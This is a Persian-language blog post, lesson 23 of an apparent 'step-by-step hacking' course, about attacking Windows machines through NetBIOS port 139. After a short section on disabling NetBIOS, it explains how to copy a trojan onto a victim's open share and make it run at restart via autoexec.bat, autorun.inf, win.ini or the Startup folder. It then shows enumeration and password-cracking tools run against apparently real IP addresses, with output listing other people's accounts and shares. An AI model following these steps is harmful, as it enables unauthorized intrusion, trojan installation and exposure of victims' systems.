سفارش تبلیغ
صبا ویژن
محبوب ترینِ کارها نزد خدا، شادمان ساختن مؤمن است، از طریق برطرف ساختن گرسنگی اش و یا زدودن اندوهش . [.رسول خدا صلی الله علیه و آله]
آموزش گام به گام هک - درس شماره ۲۳ - آرشیو مقالات کامپیوتری
  • پست الکترونیک
  • شناسنامه
  •  RSS 
  • پارسی بلاگ
  • پارسی یار
  • - خلاصه درس: در این درس نکات دیگری راجع به پورت ۱۳۹ می‌آموزیم.

    ◊ چگونه NetBIOS را روی کامپیوتر خودمان فعال یا غیر فعال کنیم؟


    برای غیرفعال کردن NetBIOS در ویندوز با توجه به نوع آن ویندوز روش‌های مختلفی هست. جدول پایینی برای همین موضوع طراحی شده است:

    Win 2000
    Win XP Home
    Win XP Professional

    Start > Programs > Administrative Tools > Local Security Settings > Local Policies > Security Options > Additional restrictions of anonymous connections > Local policy setting > "No access without explicit anonymous permissions" > Ok

    Start > Programs > Administrative Tools > Local Security Settings > Local Policies >
    1) Network Access: Do not allow anonymous enumeration of SAM accounts: Enabled
    2) Network Access: Do not allow anonymous enumeration of SAM accounts and shares: Enabled

    Start > Run > regedit > HKEY_LOCAL_MACHINE > HKEY_LOCAL_MACHINE > SYSTEM > CurrentControlSet > Control > LSA > RestrictAnonymous=2

    می‌تونید به کمک فایروال یا روتر پورت‌های زیر را ببندید:

    135 TCP DCE/RPC Portmapper

    137 TCP/UDP NetBIOS Name Service

    138 TCP/UDP NetBIOS Datagram Service

    139 TCP NetBIOS Session Service

    445 TCP Microsoft-DS (Windows 2000 CIFS/SMB)



    ۱- وقتی پورت ۱۳۹ رو می‌بندید، دیگه نمی‌تونید از NetBIOS استفاده کنید ( مگر اینکه دوباره پورت رو به صورت فعال در‌ آورید). پس وقتی که کسی رو می‌خواهید هک کنید، نیاز دارید که برای مدت کوتاهی دوباره پورت رو فعال کنید.

    ۲- می‌بینید که مثلا برای ویندوز ۲۰۰۰ به سه روش کار کنید، در این جدول فقط کافی است یکی رو اعمال کنید.

    ۳- اگه بعد از غیر فعال کردن، دوباره بخواهید فعال کنید، در مرحله آخر هر یک از روش‌های بالا، گزینه‌ای که مخالف گزینه ذکر شده در جدول است رو انتخاب کنید، مثلا اگه در جدول Enabled را نوشته‌ایم، شما Disable را انتخاب کنید.



    ◊ چگونه از این امکانات به اشتراک گذاشتن، برای اجرای یک تروجان روی کامپیوتر قربانی استفاده کنیم؟


    خوب ما هنوز طریقه استفاده از تروجان رو یاد نگرفتیم ولی سعی می‌کنم تو یکی از درس‌های آینده اونو توضیح بدم. ما اینجا می‌خواهیم از تروجان در رابطه با پورت ۱۳۹ استفاده کنیم. حالا سوال این است که تروجان (trojan) چیست؟
    تروجان به‌طور ساده برنامه‌ای اجرایی است، که ما برای طرف مقابل می‌فرستیم و اگه طرف مقابل اونو اجرا کنه، ما می‌تونیم کنترل سیستم‌ اونو به دست بیاریم. تا اینجا کافی است فعلا ولی بعدا بیشتر توضیح می‌دم.
    حالا همان بحث تروجان ولی در رابطه با پورت ۱۳۹ :
    روش کار به این صورت است که فرضا من الان تونستم یک درایو رو از یک کامپیوتر با پورت باز Share کنم. حالا فایل تروجان ( سرور تروجان ) را upload می‌کنم به اون کامپیوتر و اسمی براش انتخاب می‌کنم که طرف مقابل رو به اجرای فایل تشویق کنه. یک اشتباهی که بعضی‌ها می‌کنند اینه که بعد از کپی کردن تروجان در کامپیوتر هدف، خود هکر می‌آد و فایل رو دابل کلیک می‌کنه، در این حالت تروجان روی کامپیوتر خودمون (هکر) اجرا می‌شه نه کامپیوتر قربانی. پس ما فقط فایل رو می‌فرستیم و منتظر می‌مونیم که طرف مقابل اجرا کنه.

    حالا چند روش رو مطرح می‌کنم که در شرایط خاص حالتی رو ایجاد می‌کنه که نیازی با دابل‌کلیک توسط قربانی نباشد:
    ۱- اگه به درایو C کامپیوتر مقابل دسترسی دارید، یک سطر به فایل autoexec.bat اضافه کنید که نام و مسیر فایل اجرایی را در اون سطر بنویسید. مثلا اگه اسم تروجان ali.exe باشد و در مسیر d:\newfolder باشد، سطری که اضافه می‌کنیم به صورت زیر است:

    d:\newfolder\ali.exe

    در این حالت به محض اولین restart کامپیوتر، تروجان اجرا خواهد شد.
    ۲- اگه به درایو C دسترسی دارید، می‌تونید فایلی به اسم Autorun.inf ایجاد کنید و دستورات زیر را بنویسید ( سطر آخر مطابق با همان تروجان فرضی که در مثال قبل گفتیم، نوشته شده است، اونو با توجه به اسم تروجان و مسیر اون تغییر دهید) :

    [autorun]

    open=d:\newfolder\ali.exe

    ۳- اگه به فولدر ویندوز دسترسی دارید، می‌تونید یک سطر مثل همان مثال قبل ولی برای فایل winstart.bat اجرا کنید. در این حالت هم به محض restart اجرا خواهد شد.
    ۴- اگه به فولدر ویندوز دسترسی دارید، در فایل win.ini و بعد از قسمتی که [windows] نوشته، این سطر رو اضافه کنید:

    run=d:\newfolder\ali.exe

    ۵- اگه به فولدر ویندوز دسترسی دارید، می‌تونید تروجان رو به فولدر Start Menu\Startup اضافه کنید. در این حالت نیازی به ویرایش هیچ فایل دیگری نیست.


    ◊ ابزارهای کمکی: ۱- ابزارهای خط فرمانی


    ۱- enum :
    این برنامه را از اینجا داون‌لود کنید. enum نرم‌افزاری با قابلیت‌های فوق‌العاده است. از جمله توانایی‌هایی که دارد، در مواردی است که کامپیوتر طرف مقابل برای اعمال sharing از ما پسورد بخواد. در این موارد می‌تونیم به کمک enum و لیستی از پسوردهایی که در یک فایل ذخیره شده، تعداد زیادی پسورد رو چک کنیم ( اصطلاحا cracking ) و شاید به نتیجه برسیم. ( این موضوع را بعدا بیشتر توضیح مب‌دم) کاربردی که الان مد نظر ماست، پیدا کردن لیست share هایی است که کامپیوتر مقابل برای ما باز گذاشته است. مثلا من دستور زیر را تایپ کردم، تا لیست اشتراک‌های آن ip خاص در آن لحظه رو بدست بیارم:

    enum -S 217.218.84.29

    و جواب شنیدم:

    server: 217.218.84.29

    setting up session... success.

    enumerating shares (pass 1)... got 10 shares, 0 left:

    E$ IPC$ D$ print$ SharedDocs F$ Printer2 ADMIN$ C$ Printer

    cleaning up... success.

    ملاحظه می‌فرمایید که درایو‌های E و D و F و C و نیز SharedDocs و ... لیست شده است. بقیه مراحل مثل درس ۲۱ است. (دقت کنید که در این حالت نیازی به null session نیست ).

    ۲- nbtscan :
    این برنامه را از اینجا داون‌لود کنید. این برنامه دقیقا معادل nbtstat است ولی با این تفاوت که می‌تونه تعداد زیادی ip رو همزمان تست کنه و لیست share ها رو بدست بیاره. این دقیقا راه‌حلی است برای سوالی که خیلی از شما دوستان پرسیده بودین. مثلا اگه بنویسم:

    nbtscan -v -s : 195.219.49.0-30

    که لیست اشتراک‌ها رو از ip شماره 195.219.49.0 تا 195.219.49.30 بدست میاره. جواب می‌شنوم:

    195.219.49.1 Recvfrom failed: Connection reset by peer

    195.219.49.5 Recvfrom failed: Connection reset by peer

    195.219.49.6 Recvfrom failed: Connection reset by peer

    195.219.49.7 Recvfrom failed: Connection reset by peer

    195.219.49.8 Recvfrom failed: Connection reset by peer

    195.219.49.12 Recvfrom failed: Connection reset by peer

    195.219.49.23:MRS.ZADE :00U

    195.219.49.23:ATINET_MRA :00G

    195.219.49.23:MRS.ZADE :03U

    195.219.49.23:MAC:44-45-53-54-00-00

    195.219.49.28:MAC:44-45-53-54-00-00

    195.219.49.26:KIYARASH-R96L0K:00U

    195.219.49.26:KIYARASH-R96L0K:20U

    195.219.49.26:WORKGROUP :00G

    195.219.49.26:WORKGROUP :1eG

    195.219.49.26:MAC:00-53-45-00-00-00

    195.219.49.22:FARHANG-ZCT780D:00U

    195.219.49.22:FARHANG-ZCT780D:20U

    195.219.49.22:WORKGROUP :00G

    195.219.49.22:WORKGROUP :1eG

    195.219.49.22:MAC:00-53-45-00-00-00

    195.219.49.29:TESSA :00U

    195.219.49.29:WORKGROUP :00G

    195.219.49.29:TESSA :03U

    195.219.49.29:MAC:44-45-53-54-00-00

    195.219.49.25:MAC:44-45-53-54-00-00

    در مورد ip هایی که 20U را می‌بینید، یعنی sharing رو میشه استفاده کرد.

    ۳- winfo :
    اینم از جمله برنامه‌هایی است که باید بگم آخر برنامه است!! از اینجا داون‌لود کنید. البته توانایی تست تعداد زیادی ip رو نداره ولی وقتی یه ip رو تست می‌کنه همه‌چی شو در رو می‌کنه. (البته میشه گفت همه این کارها رو می‌شه با enum هم انجام داد ). مثلا من دستور زیر را تایپ کردم :

    winfo 195.219.49.184 -n -v

    و به نتایج زیر رسیدم:

    Winfo 2.0 - copyright (c) 1999-2003, Arne Vidstrom

    - http://www.ntsecurity.nu/toolbox/winfo/



    Trying to establish null session...



    Null session established.





    SYSTEM INFORMATION:



    - OS version: 4.0



    DOMAIN INFORMATION:



    - Primary domain (legacy): DSG

    - Account domain: TEHRAN



    Warning: Unable to retrieve domain DNS information.

    Reason : Not supported by the remote OS.





    PASSWORD POLICY:



    - Time between end of logon time and forced logoff: No forced logoff

    - Maximum password age: 42 days

    - Minimum password age: 0 days

    - Password history length: 0 passwords

    - Minimum password length: 0 characters



    LOCOUT POLICY:



    - Lockout duration: 30 minutes

    - Reset lockout counter after 30 minutes

    - Lockout threshold: 0



    SESSIONS:



    - Computer: ARTAWILL-V0P1QR

    - User:



    LOGGED IN USERS:



    * Administrator



    USER ACCOUNTS:



    * Administrator



    - Password age: 666 days

    - Privilege level: Administrator

    - Home directory:

    - Home directory mapped as:

    - Comment: Built-in account for administering the computer/domain

    - Account is: Enabled

    - User can change password: Yes

    - Account is locked out: No

    - Password never expires: Yes

    - The account is: Normal user

    - Logon script path:

    - Full name:

    - User comment:

    - Can log in from workstations: All

    - Last logon to this DC / computer: Mon Mar 03 23:10:23 2003

    - Last logoff from this DC / computer: Tue Dec 11 23:57:37 2001

    - Account expires: Never

    - Max disk space: Unlimited

    - Failed logins in a row to this DC / computer: 0

    - Path to user profile:

    - Password has expired: No



    (This account is the built-in administrator account)



    * Guest



    - Password age: 680 days

    - Privilege level: Guest

    - Home directory:

    - Home directory mapped as:

    - Comment: Built-in account for guest access to the computer/domain

    - Account is: Disabled

    - User can change password: No

    - Account is locked out: No

    - Password never expires: Yes

    - The account is: Normal user

    - Logon script path:

    - Full name:

    - User comment:

    - Can log in from workstations: All

    - Last logon to this DC / computer: None

    - Last logon to this DC / computer: None

    - Account expires: Never

    - Max disk space: Unlimited

    - Failed logins in a row to this DC / computer: 0

    - Path to user profile:

    - Password has expired: No



    (This account is the built-in guest account)



    * TEST



    - Password age: 680 days

    - Privilege level: User

    - Home directory:

    - Home directory mapped as:

    - Comment:

    - Account is: Enabled

    - User can change password: Yes

    - Account is locked out: No

    - Password never expires: No

    - The account is: Normal user

    - Logon script path:

    - Full name:

    - User comment:

    - Can log in from workstations: All

    - Last logon to this DC / computer: None

    - Last logon to this DC / computer: None

    - Account expires: Never

    - Max disk space: Unlimited

    - Failed logins in a row to this DC / computer: 0

    - Path to user profile:

    - Password has expired: Yes



    WORKSTATION TRUST ACCOUNTS:



    INTERDOMAIN TRUST ACCOUNTS:



    SERVER TRUST ACCOUNTS:



    SHARES:



    * ADMIN$



    - Type: Special share reserved for IPC or administrative share

    - Remark: Remote Admin



    * IPC$



    - Type: Unknown

    - Remark: Remote IPC



    * C$



    - Type: Special share reserved for IPC or administrative share

    - Remark: Default share

    بعدا سعی خواهم کرد که در مورد تک تک اینها بحث کنم براتون. ولی به عنوان مثال در آخرها می‌تونین، share ها رو ببینید.

    ۴- NAT :
    این برنامه را از اینجا داون‌لود کنید. یکی از مهم‌ترین کاربرد‌های اون crack کردن پسورد sharing است ( مثل enum ). برای کار با NAT کافی است، بنویسید nat و بعد یک فاصله و بعد ip را می‌نویسیم. حتما تست کنید و نتیجه رو ببینید... ( تکلیف برای خودتون )

    ۵- و ...


    ◊ ابزارهای کمکی: ۲- ابزارهای گرافیکی


    ۱- netbrute :
    این برنامه را از اینجا داون‌لود کنید. من از بین ابزارهای گرافیکی اینو توصیه می‌کنم اگرچه به اندازه دو نرم‌افزار بعدی مشهور نیست. من نمی‌خوام روش کار با اینو توضیح بدم چون خیلی تابلو‌ ه! ضمنا این نرم‌افزار داخل خودش یک پورت اسکنر هم داره که خیلی به درد می‌خوره. حتما حتما حتما داون‌لود کنید اینو و اونقدر انگولکش کنید که سر در بیارین ازش. قرار نیست که همی‌چی رو من بهتون بگم !!

    ۲- Legion :
    اگه بگم مشهورترین نرم‌افزار اسکن کردن پورت‌ ۱۳۹ این نرم‌افزاره، سخن گزافی نیست!! خیلی‌ها کشته مرده اون هستن ولی من زیاد ازش خوشم نمی‌آد. اما باید قبول کرد که کارش واقعا عالیه!!! به هر حال اگه خواستین داول‌لود کنید، اینجا رو کلیک کنید.

    ۳- DumpSec یا DumpACL :
    این هم خیلی معروفه. اگه خواستین می‌تونین از اینجا داون‌لود کنید.



    ◊ آیا چیز دیگه‌ای راجع به این پورت مونده که بحث نشده باشد؟


    بله!
    ۱- یه نرم‌افزاری هست به اسم pqwak که این‌طوری که می‌گن، اگه کامپیوتر مقابل ویندوز ۹۸ باشه، می‌تونه پسورد اونو سه سوت در بیاره. ( این برنامه از نقطه ضعف ویندوز ۹۸ راجع به netbios استفاده می‌کنه و اونو exploit می‌کنه) چون من درسم راجع به هک کردن سرورهاست و نه کلاینت، پس نباید زیاد به درد ما بخوره ( توجه کنید که ویندوز ۹۸ تو کار کلاینت‌اش هم مونده، چه برسه به اینکه سرور باشه! ). خودتون بگردین و اونو اگه می‌خواین پیدا کنید.
    ۲- ما بحث استفاده از نقاط ضعف پورت‌ها رو هنوز شروع نکرده‌ایم و در مورد پورت ۱۳۹ هم همینطوره. به عنوان مثال روش‌هایی هست که پورت ۱۳۹ رو exploit کنیم و اون مراحلی که توش گیر می‌کردیم رو دور بزنیم.
    ۳- نکته آخر راجع به این پورت اینه که مواظب خودتون باشین. حتما ورزش کنین. سیگار نکشین چون برای سلامتی خیلی بده! ( قابل توجه بعضی‌ها) حرف بابا مامانتون رو گوش کنین. اگه کنکور دارین با اینکه دارین مشروط می‌شین، به‌جای هک کردن برین درس بخونین! همین‌ها... باقی بقایت، جانم فدایت ...

    کوچیک ::: سه شنبه 86/7/24::: ساعت 3:0 صبح
    نظرات دیگران: نظر

    لیست کل یادداشت های این وبلاگ

    >> بازدیدهای وبلاگ <<
    بازدید امروز: 4
    بازدید دیروز: 1
    کل بازدید :31829

    >>اوقات شرعی <<

    >> درباره خودم <<

    >>لوگوی وبلاگ من<<
    آموزش گام به گام هک - درس شماره ۲۳ - آرشیو مقالات کامپیوتری

    >>آرشیو شده ها<<

    >>جستجو در وبلاگ<<
    جستجو:

    >>اشتراک در خبرنامه<<
     

    >>تبلیغات<<